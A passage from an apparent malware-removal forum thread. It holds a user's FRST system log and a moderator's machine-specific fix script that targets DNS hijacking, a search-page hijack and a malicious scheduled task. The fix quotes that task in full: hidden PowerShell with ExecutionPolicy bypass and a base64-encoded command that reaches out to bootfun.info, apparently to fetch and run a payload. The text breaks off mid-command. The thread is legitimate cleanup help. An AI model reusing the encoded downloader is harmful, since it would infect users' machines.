FirewallRules: [UDP Query User{D6A6B567-2CEF-41E4-9402-949DD3F7A262}G:\cnc first decade\command & conquer red alert™ ii\ra2\game.exe] => (Allow) G:\cnc first decade\command & conquer red alert™ ii\ra2\game.exe
FirewallRules: [TCP Query User{82CE8EB5-9754-410D-8C28-AF5A7F79619E}G:\cnc first decade\command & conquer red alert™ ii\ra2\gamemd.exe] => (Allow) G:\cnc first decade\command & conquer red alert™ ii\ra2\gamemd.exe
FirewallRules: [UDP Query User{2AD9E574-76B9-40BF-9621-937B93DAA321}G:\cnc first decade\command & conquer red alert™ ii\ra2\gamemd.exe] => (Allow) G:\cnc first decade\command & conquer red alert™ ii\ra2\gamemd.exe
FirewallRules: [TCP Query User{9FBF99EE-1038-4829-ACAC-C362B3626BE5}C:\program files (x86)\tibco\studio-community-3.5\studio\3.5\studio-rcp\eclipse\studioforanalyst.exe] => (Allow) C:\program files (x86)\tibco\studio-community-3.5\studio\3.5\studio-rcp\eclipse\studioforanalyst.exe
FirewallRules: [UDP Query User{207BEEC6-767A-40A4-A707-11D18CB4429C}C:\program files (x86)\tibco\studio-community-3.5\studio\3.5\studio-rcp\eclipse\studioforanalyst.exe] => (Allow) C:\program files (x86)\tibco\studio-community-3.5\studio\3.5\studio-rcp\eclipse\studioforanalyst.exe
FirewallRules: [TCP Query User{1443DDD5-57DA-4113-8F11-F9ADAC3DD107}C:\program files (x86)\steam\steam.exe] => (Allow) C:\program files (x86)\steam\steam.exe
FirewallRules: [UDP Query User{0BCD0401-4E57-4E60-9D47-759667E2C86C}C:\program files (x86)\steam\steam.exe] => (Allow) C:\program files (x86)\steam\steam.exe
FirewallRules: [{0E83E870-4D96-49D8-9875-FF7362062F99}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.1737\Agent.exe
FirewallRules: [{BC920603-7977-462F-B66E-0AF50D88F259}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.1737\Agent.exe
FirewallRules: [{A039887E-CA7A-45A6-A6A7-0C16AC7B0A6E}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{0863B0CA-C98B-4FB1-9E80-9A808FE5745C}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{4F340B66-B970-43E3-8641-E8B09553FB9A}] => (Allow) C:\Users\Thomas\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{45E435A9-8C71-4A85-91FC-1853475CA36D}] => (Allow) C:\Users\Thomas\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{30FD1B40-5D4F-435D-A6FC-6A8149E8C8FC}] => (Allow) C:\Users\Thomas\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{F6A70613-1F5A-4541-AF7B-41BB92B1D197}] => (Allow) C:\Users\Thomas\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{1C36AC92-F717-477B-9BD9-C43FD7333B82}] => (Allow) C:\Users\Thomas\AppData\Local\Facebook\Video\Skype\FacebookVideoCalling.exe
FirewallRules: [TCP Query User{40893ED4-C2C6-4982-B7CA-1CCC31059F42}C:\users\thomas\appdata\local\microsoft\lwaplugin\x86\15.8\lwaplugin.exe] => (Allow) C:\users\thomas\appdata\local\microsoft\lwaplugin\x86\15.8\lwaplugin.exe
FirewallRules: [UDP Query User{073C8EF8-2E92-4A06-AE2F-9545601C96B2}C:\users\thomas\appdata\local\microsoft\lwaplugin\x86\15.8\lwaplugin.exe] => (Allow) C:\users\thomas\appdata\local\microsoft\lwaplugin\x86\15.8\lwaplugin.exe
FirewallRules: [{9C88D47B-E5D4-4BDC-8B04-94808CDD4D9B}] => (Allow) C:\Program Files (x86)\iTunes\iTunes.exe
FirewallRules: [{6955431D-B046-46F5-993D-483AC65F285B}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer.exe
FirewallRules: [{16819C35-8A07-4104-B88D-4CA297F60F5F}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer.exe
FirewallRules: [{BB3F1D47-5944-4F5A-9D2B-20A67475B929}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
FirewallRules: [{5627B82E-FAF6-45FF-BF06-7356FCD7EE6B}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
FirewallRules: [TCP Query User{F186956B-55CC-4D10-AC76-68CBCC33C885}C:\users\thomas\appdata\local\popcorn time\node-webkit\popcorn time.exe] => (Block) C:\users\thomas\appdata\local\popcorn time\node-webkit\popcorn time.exe
FirewallRules: [UDP Query User{F998AA64-CEB1-40F6-847F-2B14C22092BB}C:\users\thomas\appdata\local\popcorn time\node-webkit\popcorn time.exe] => (Block) C:\users\thomas\appdata\local\popcorn time\node-webkit\popcorn time.exe
FirewallRules: [{02CEA483-93FB-4E9B-B340-79C50885C2EF}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{3A73E59A-1B62-484B-9B6E-275CAB8927E1}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{FE6D7952-BB1C-4995-B192-9EDBBB807FE9}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Company of Heroes Relaunch\RelicCOH.exe
FirewallRules: [{86069B56-A219-40D2-85F5-AE986AD145FD}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Company of Heroes Relaunch\RelicCOH.exe
FirewallRules: [{02ABC2CF-6D44-4121-853C-FDA99389FB8B}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Company of Heroes\RelicCOH.exe
FirewallRules: [{0263D880-A510-4C64-84A2-6A4D91E7BD73}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Company of Heroes\RelicCOH.exe
FirewallRules: [TCP Query User{CB4C4FC7-829D-413C-A718-C7F1C5FC3C0C}C:\program files (x86)\steam\steamapps\common\company of heroes\relicdownloader\relicdownloader.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\company of heroes\relicdownloader\relicdownloader.exe
FirewallRules: [UDP Query User{DC7A120D-3A3A-471A-8A0A-90971076DA56}C:\program files (x86)\steam\steamapps\common\company of heroes\relicdownloader\relicdownloader.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\company of heroes\relicdownloader\relicdownloader.exe
FirewallRules: [TCP Query User{EFCA8B3C-F90A-4FD0-917A-A2C9FC13417D}C:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) C:\program files (x86)\hearthstone\hearthstone.exe
FirewallRules: [UDP Query User{6FAD40A9-D27A-42EC-8932-DE2F2337F432}C:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) C:\program files (x86)\hearthstone\hearthstone.exe
FirewallRules: [{0052D522-1264-4D92-85CB-4B18EB040C2D}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{C17D4266-FC70-4F67-8A9A-A287D03642D3}] => (Allow) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe

==================== Herstelpunten =========================

30-12-2015 18:04:38 Windows Update
30-01-2016 16:51:22 Windows Update
30-01-2016 17:33:53 Windows Update
30-01-2016 20:44:37 Windows Update

==================== Defecte Apparaatbeheer Apparaten =============

Name: HP Integrated Module with Bluetooth 2.1 Wireless Technology
Description: HP Integrated Module with Bluetooth 2.1 Wireless Technology
Class Guid: {e0cbf06c-cd8b-4647-bb8a-263b43f0f974}
Manufacturer: Broadcom
Service: BTHUSB
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

==================== Eventlog fouten: =========================

Applicatiefouten:
==================
Error: (01/31/2016 03:37:59 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Naam van toepassing met fout: rundll32.exe, versie: 6.1.7600.16385, tijdstempel: 0x4a5bc637
Naam van module met fout: KERNELBASE.dll, versie: 6.1.7601.19110, tijdstempel: 0x56842600
Uitzonderingscode: 0xe06d7363
Foutoffset: 0x0000c42d
Id van proces met fout: 0xd3c
Starttijd van toepassing met fout: 0xrundll32.exe0
Pad naar toepassing met fout: rundll32.exe1
Pad naar module met fout: rundll32.exe2
Rapport-id: rundll32.exe3

Error: (01/31/2016 03:18:02 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Naam van toepassing met fout: rundll32.exe, versie: 6.1.7600.16385, tijdstempel: 0x4a5bc637
Naam van module met fout: KERNELBASE.dll, versie: 6.1.7601.19110, tijdstempel: 0x56842600
Uitzonderingscode: 0xe06d7363
Foutoffset: 0x0000c42d
Id van proces met fout: 0x12d4
Starttijd van toepassing met fout: 0xrundll32.exe0
Pad naar toepassing met fout: rundll32.exe1
Pad naar module met fout: rundll32.exe2
Rapport-id: rundll32.exe3

Error: (01/31/2016 02:17:58 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Naam van toepassing met fout: rundll32.exe, versie: 6.1.7600.16385, tijdstempel: 0x4a5bc637
Naam van module met fout: KERNELBASE.dll, versie: 6.1.7601.19110, tijdstempel: 0x56842600
Uitzonderingscode: 0xe06d7363
Foutoffset: 0x0000c42d
Id van proces met fout: 0x1100
Starttijd van toepassing met fout: 0xrundll32.exe0
Pad naar toepassing met fout: rundll32.exe1
Pad naar module met fout: rundll32.exe2
Rapport-id: rundll32.exe3

Error: (01/31/2016 01:57:59 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Naam van toepassing met fout: rundll32.exe, versie: 6.1.7600.16385, tijdstempel: 0x4a5bc637
Naam van module met fout: KERNELBASE.dll, versie: 6.1.7601.19110, tijdstempel: 0x56842600
Uitzonderingscode: 0xe06d7363
Foutoffset: 0x0000c42d
Id van proces met fout: 0x970
Starttijd van toepassing met fout: 0xrundll32.exe0
Pad naar toepassing met fout: rundll32.exe1
Pad naar module met fout: rundll32.exe2
Rapport-id: rundll32.exe3

Error: (01/31/2016 01:38:21 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Naam van toepassing met fout: rundll32.exe, versie: 6.1.7600.16385, tijdstempel: 0x4a5bc637
Naam van module met fout: KERNELBASE.dll, versie: 6.1.7601.19110, tijdstempel: 0x56842600
Uitzonderingscode: 0xe06d7363
Foutoffset: 0x0000c42d
Id van proces met fout: 0x750
Starttijd van toepassing met fout: 0xrundll32.exe0
Pad naar toepassing met fout: rundll32.exe1
Pad naar module met fout: rundll32.exe2
Rapport-id: rundll32.exe3

Error: (01/31/2016 01:18:24 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Naam van toepassing met fout: rundll32.exe, versie: 6.1.7600.16385, tijdstempel: 0x4a5bc637
Naam van module met fout: KERNELBASE.dll, versie: 6.1.7601.19110, tijdstempel: 0x56842600
Uitzonderingscode: 0xe06d7363
Foutoffset: 0x0000c42d
Id van proces met fout: 0x17ec
Starttijd van toepassing met fout: 0xrundll32.exe0
Pad naar toepassing met fout: rundll32.exe1
Pad naar module met fout: rundll32.exe2
Rapport-id: rundll32.exe3

Error: (01/31/2016 12:57:52 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Naam van toepassing met fout: rundll32.exe, versie: 6.1.7600.16385, tijdstempel: 0x4a5bc637
Naam van module met fout: KERNELBASE.dll, versie: 6.1.7601.19110, tijdstempel: 0x56842600
Uitzonderingscode: 0xe06d7363
Foutoffset: 0x0000c42d
Id van proces met fout: 0x17d8
Starttijd van toepassing met fout: 0xrundll32.exe0
Pad naar toepassing met fout: rundll32.exe1
Pad naar module met fout: rundll32.exe2
Rapport-id: rundll32.exe3

Error: (01/31/2016 12:37:54 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Naam van toepassing met fout: rundll32.exe, versie: 6.1.7600.16385, tijdstempel: 0x4a5bc637
Naam van module met fout: KERNELBASE.dll, versie: 6.1.7601.19110, tijdstempel: 0x56842600
Uitzonderingscode: 0xe06d7363
Foutoffset: 0x0000c42d
Id van proces met fout: 0x16e4
Starttijd van toepassing met fout: 0xrundll32.exe0
Pad naar toepassing met fout: rundll32.exe1
Pad naar module met fout: rundll32.exe2
Rapport-id: rundll32.exe3

Error: (01/31/2016 12:17:57 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Naam van toepassing met fout: rundll32.exe, versie: 6.1.7600.16385, tijdstempel: 0x4a5bc637
Naam van module met fout: KERNELBASE.dll, versie: 6.1.7601.19110, tijdstempel: 0x56842600
Uitzonderingscode: 0xe06d7363
Foutoffset: 0x0000c42d
Id van proces met fout: 0x1478
Starttijd van toepassing met fout: 0xrundll32.exe0
Pad naar toepassing met fout: rundll32.exe1
Pad naar module met fout: rundll32.exe2
Rapport-id: rundll32.exe3

Error: (01/30/2016 08:51:49 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Naam van toepassing met fout: rundll32.exe, versie: 6.1.7600.16385, tijdstempel: 0x4a5bc637
Naam van module met fout: KERNELBASE.dll, versie: 6.1.7601.19110, tijdstempel: 0x56842600
Uitzonderingscode: 0xe06d7363
Foutoffset: 0x0000c42d
Id van proces met fout: 0x15b8
Starttijd van toepassing met fout: 0xrundll32.exe0
Pad naar toepassing met fout: rundll32.exe1
Pad naar module met fout: rundll32.exe2
Rapport-id: rundll32.exe3

Systeemfouten:
=============
Error: (01/31/2016 12:00:56 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: De Easybits Shared Services for Windows-service is onverwacht beëindigd. Dit is nu 1 keer gebeurd.

Error: (01/31/2016 12:00:55 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: De HP CUE DeviceDiscovery-service-service is onverwacht beëindigd. Dit is nu 1 keer gebeurd.

Error: (01/31/2016 12:00:55 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: De hpqcxs08-service is onverwacht beëindigd. Dit is nu 1 keer gebeurd.

Error: (01/30/2016 09:07:16 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installatiefout: de volgende update kan niet worden geïnstalleerd, foutcode 0x800706ba: Update voor Microsoft Office 2010 (KB3085512) 32-bits versie.

Error: (01/30/2016 09:07:16 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installatiefout: de volgende update kan niet worden geïnstalleerd, foutcode 0x800706ba: KB3108664: Beveiligingsupdate voor Windows 7 voor x64-systemen.

Error: (01/30/2016 09:07:16 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installatiefout: de volgende update kan niet worden geïnstalleerd, foutcode 0x800706ba: Security Update for SQL Server 2008 Service Pack 3 (KB3045305).

Error: (01/30/2016 09:07:16 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installatiefout: de volgende update kan niet worden geïnstalleerd, foutcode 0x800706ba: KB3067903: Beveiligingsupdate voor Windows 7 voor x64-systemen.

Error: (01/30/2016 09:07:16 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installatiefout: de volgende update kan niet worden geïnstalleerd, foutcode 0x800706ba: Update voor Microsoft Office 2010 (KB3055047) 32-bits versie.

Error: (01/30/2016 09:07:16 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installatiefout: de volgende update kan niet worden geïnstalleerd, foutcode 0x800706ba: Beveiligingsupdate voor Microsoft .NET Framework 4.5, 4.5.1 en 4.5.2 op Windows 7, Vista, Server 2008, Server 2008 R2 x64 (KB3074550).

Error: (01/30/2016 09:07:16 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installatiefout: de volgende update kan niet worden geïnstalleerd, foutcode 0x800706ba: KB3086255: Beveiligingsupdate voor Windows 7 voor x64-systemen.

==================== Geheugen info ===========================

Processor: Intel® Core™ i5 CPU M 430 @ 2.27GHz
Percentage geheugen in gebruik: 62%
Totaal fysiek RAM-geheugen: 4022.87 MB
Beschikbaar fysiek RAM-geheugen: 1492.25 MB
Totaal Virtueel geheugen: 8043.94 MB
Beschikbaar Virtual geheugen: 5124.3 MB

==================== Schijven ================================

Drive c: () (Fixed) (Total:233.48 GB) (Free:54.59 GB) NTFS ==>[systeem met boot componenten (verkregen van schijf)]
Drive d: (RECOVERY) (Fixed) (Total:17.05 GB) (Free:2.77 GB) NTFS ==>[systeem met boot componenten (verkregen van schijf)]
Drive e: (HP_TOOLS) (Fixed) (Total:0.1 GB) (Free:0.09 GB) FAT32
Drive g: (Games) (Fixed) (Total:214.94 GB) (Free:100.97 GB) NTFS

==================== MBR & Partitietabel ==================

========================================================
Disk: 0 (Size: 465.8 GB) (Disk ID: D1034207)
Partition 1: (Not Active) - (Size=993 KB) - (Type=42)
Partition 2: (Active) - (Size=199 MB) - (Type=42)
Partition 3: (Not Active) - (Size=233.5 GB) - (Type=42)
Partition 4: (Not Active) - (Size=232.1 GB) - (Type=42)

==================== Eind van Addition.txt ============================

#2
Essexboy

Posted 31 January 2016 - 09:36 AM

GeekU Moderator

Retired Staff
69,964 posts

Let me know if defender still reports after this

CAUTION : This fix is only valid for this specific machine, using it on another may break your computer

Open notepad and copy/paste the text in the quotebox below into it:

CreateRestorePoint:
Tcpip\Parameters: [NameServer] 82.163.142.3 95.211.158.130
Tcpip\..\Interfaces\{B12B7109-6CCC-4B7F-B62A-9DCD9AB7A826}: [NameServer] 82.163.142.3 95.211.158.130
HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://search.searchcompletion.com/?si=16615&home=true
SearchScopes: HKU\S-1-5-21-1460008453-1702061876-2463211388-1000 -> {3BD44F0E-0596-4008-AEE0-45D47E3A8F0E} URL = hxxp://search.searchcompletion.com/?si=16615&chrome=true&q={searchTerms}
BHO: Geen Naam -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> Geen bestand
Toolbar: HKU\S-1-5-21-1460008453-1702061876-2463211388-1000 -> Geen Naam - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - Geen bestand
2015-12-19 14:20 - 2015-12-19 14:20 - 0000000 _____ () C:\Users\Thomas\AppData\Local\{DC0B4DB1-A5EB-4CF1-A01B-0882609F4995}
Task: {397422DB-C117-4E84-99CD-C19801182DA8} - System32\Tasks\{8B4D71D3-DC18-FA14-C88F-B60E35A1D3FA} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAGIAbwBvAHQAZgB1AG4ALgBpAG4AZgBvAC8AdQAvAD8AcQA9AFQAaABWAEcAUgBJAHUASgB2AGMAZQA0AG4ATwBXAEsAOQBhAHkAYgBCAGsAbgBGAEgAUgAxAHMAYwA5AG4ALQBUAFQANgBmAFkAbgBnAGIAWgBxAF8AdwBNAEEAMAB5AEwAYgB1AEUAMQBRAEoAWQBhADMATAB3AFEAMgBkAEkAQgBmAFcASgA3AEoAcwBlADQAOQBhAHgANwBqADMAMgBTAHgAdQBNAHEAXwBaAFIAcQBJAFgARABLAEoAXwB3AG4ANABEAGUAVgB0ADUAbwBVAEQAMABHAFAAMwBkAEsALQBxAEoAcgByAC0AMABOADIASABaAEYATgBhAG4AbgBGAEsAbQBQAGkANQBIAEkAYgBJAHQARQBBAG8ARABfAE8AYwBiAEcANQA3AFQAdgBCAE0AdgAtAC0AcABFAGoAVQBBAGEASgB1ADYASgBJAEQAZQBkAF8ALQBfAGgAMgBUAGoAZwAyAG8AOQBsAFAAZABOAGkAMQAwADQAeAAxAHMAcABUADgAYQBoAHIAcQAyAEUAbgBiAE4AVgBxAEwAVgBWADEAcwA2ADEAcgBaAHcARQBLAEwATQBwAG0AbgBVAE0AUgB6AHgANQBKAGoAZABEAEwAUwA4AGwAWgB1AFoAWgBIAFAAegBJAEgARABMAGsAcwAtAFYAeQBSAGsAeQBrADEANAB4AEUAQQBkAFkAMwBRAEoAbQAzADgALQBRAC0ASwBjAFMAYQBEAFYASQBWAGsANwBCAEYAagBsAE8AYgBLAGYAZQA5ADMAQQA5AEEAdABRADMARAB0AGkAQgBCAGYASgBJAHcANABLAEoAVABPAE4AMQBPADkANgBMAGYANwB6AHYAVQByADAAbgBNAGsAcAByAEcATQBpAGoAUABlAGkATwBwAFIANwBqAFAANAB1AEcARwBOAE0AcwA4AGkAbwA3AEoARwBQAEYAaABpAEgARwBIAHkARQA0AEwAYgBsAFUAYgBQAF8AdwBUAHMASgB2AHYAUABYAEEAWQBOAFQAUwBxADQAYwBnAFMAdgB4ADYAZgBiADEASwBZAGsATQBDAGYAYgBUAEIATAA1AGsAagBtAE4ALQBUAEEAWQBKAEYAdwBUADkARABIAEkARQB6AGgAcABtAGUAUQBWAEEATQBsAE0AWQBOAHkAZQBNAFYAcQB1AHUAYwB1AHUAMwAtAFcAdABuAGIASABNAHIAZgBQAG0ATABUAFUAJgBjAD0AWgA0AEMAeQBWAFkAVQBUAE8ASgAtAEYAQQA5AHoAUgBkAGQARQBWAFYANwBjAEUAagBsADMAbgB3AGUATgBOAGcAVwBFAHEAVABGAEgAcgBtAGkAYwBjAGsAZwBUADkAWgAwAE4AdgBJAFAAcgBjAEMAcAB2AHIAUQBTAHMAaABDAHUAMQBHADIARwAzAE4AQgBlAHoAcABiAEQAZABhAEMAeQBvAHEAVAAyADkARABTAGoAMgByADUAYgA5AG4AZwAyAEEAVAB4AGcANABJAEUAbQBpAGsAaAA4AGMAZwBHAGgAMgA0AFEAUABrADUARwBHAHEAWABpADYAbwBDAC0ARwBSAEEAbgBfAHcAQQAyAC0AVwAxAEcAawBmAG8AbgBxAEEAZABpAHkAcQA2AHQAXwAwAG0AbABhAFcAMgB1AFoAVAB4ADAATwBPADAAQwBCAEQASgBZADIARwBBAGsAWgBRAEUAUAB5AE4AcwBtAFIAUwBIAHEAQwBNADcAcgBmAFYAOQBBAE8AUQBrAEoARwA1AGoATQBnAGoAQwA1AFcAdgAxAFoAawBSADUAbwBFAFkAVQBEAFUASgA3AEkAVwBmAGwAWQBrAG8AaQBRAHQARwBKADIAMQBjAFkAcQBSAGIAYgBOAEkAVgB0AFMAUAA0AGcASgBFAG4AUQBmADEAbQBpAGcANABJAFAARwA2AFUANQBDADMAWgBYAEgAaQBiAHYAWQB2AHMAeQBfAGsASQB1AEsAeQBGAHAAcgBuAG8AZQBMAE8ASwAyAE4AegA2AHkARwByADMASgB2AGEAMwBLAFQAcQBaAE4ANQA2ADUAeQBWAFgAYgBxADgAdQBIADkARgAtAE0AeQBwAEIAUwAyAGwARgBQAEgAaAAwAFEAbwBiAFAASgAzAEoAVABIAG8AdgBmAHMASAA0AGUAUgA0AHQAOABaAEUAZQBlADgAUAA5AGcAegBYAGoASwBwAFIAawBLAFcAcABBAHcASgBuAFYAXwB5AEMAZwBwADUAZgBpAFUAQwAtAGgAawBOADAAbABtAEgANABpAEgAdQAtADkAQQBDAFEAdwBPAFMAVwBoAEcAeQA3AGgANQBjAGUANAA3AGwAdQAxAEEAaQB2ADUAQwBYADAAbQBZAGMAMgBDADgAcQBmAFgARgBHAFMAeABmADMAdAB1AEMAVQBRAFUAMAB3ADMAcwBHAEcAawBBAEsAOQBmAGcAaABXAGUAagAxADAATQB2ADYATABqAEUAUgBtADAANwBVADkAXwBPAHQAaQBsAFgAYgBnAEgAcwBpAEoAMQB4AHIAdABhAGoATQA1AGIAOQB2ADIAWgBrAFUAcQBDAHgAVABHADkANwBkAFYANgBjAG0AZABVAE8AVgBKAHAAZwBPAHAASABMAF8ATgB0AHEAUgBOAHYAawBVAFQAZABEAFUAcQByAEEAbgBQAG0AeQBFAEoAcQBHAGIAOAA3AGQAZQBxADEARgBoAGYAawBoAHIAUgBaAEkATQA0AFUASwBqAEwAdABrAEcARQAxAGIASAAyAFEAXwA0AEkAbABRAHEANgBqAFMAdgBtADAAVwByADIAXwBrAGUAYQB0AFYAWgB1AHkAZwBaAGQAOABjAFcAQwBNAEsARwBjAGoAZwBfAGgAMQB5ADcANQByADQAQwBBAEMALQB3ADQAbwBhAE8AdQBjAFEAMwBKAGsAcQBrAFMAdAAyAGcAOQBGADcASgBEAEEASQBXAGoAZQB2AHcAbgBzAEsAMwBXAHAATwBwAEgAJgByAD0ANAA5ADMAMgA0ADYAMgAzADMANgA3ADIAMAAzADcAOQA1ADgAMAAiADsAJABzAHQAcwBrAD0AIgB7ADgAQgA0AEQANwAxAEQAMwAtAEQAQwAxADgALQBGAEEAMQA0AC0AQwA4ADgARgAtAEIANgAwAEUAMwA1AEEAMQBEADMARgBBAH0AIgA7ACQAcAByAGkAZAA9ACIARABUACIAOwAkAGkAbgBpAGQAPQAiADAAIgA7AHQAcgB5AHsAaQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AbAB0ACAAMgApAHsAYgByAGUAYQBrADsAfQAkAHYAPQBbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AE8AUwBWAGUAcgBzAGkAbwBuAC4AVgBlAHIAcwBpAG8AbgA7AAoAaQBmACgAJAB2AC4ATQBhAGoAbwByACAALQBlAHEAIAA1ACkAewBpAGYAKAAoACQAdgAuAE0AaQBuAG8AcgAgAC0AbAB0ACAAMgApACAALQBBAE4ARAAgACgAKABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8ATwBwAGUAcgBhAHQAaQBuAGcAUwB5AHMAdABlAG0AKQAuAFMAZQByAHYAaQBjAGUAUABhAGMAawBNAGEAagBvAHIAVgBlAHIAcwBpAG8AbgAgAC0AbAB0ACAAMgApACkAewBiAHIAZQBhAGsAOwB9AH0ACgBpAGYAKAAtAE4ATwBUACAAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBQAHIAaQBuAGMAaQBwAGEAbABdAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQApAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAQgB1AGkAbAB0AEkAbgBSAG8AbABlAF0AIAAiAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgApACkAewBiAHIAZQBhAGsAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAdwBjACgAJAB1AHIAbAApAHsAJAByAHEAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEM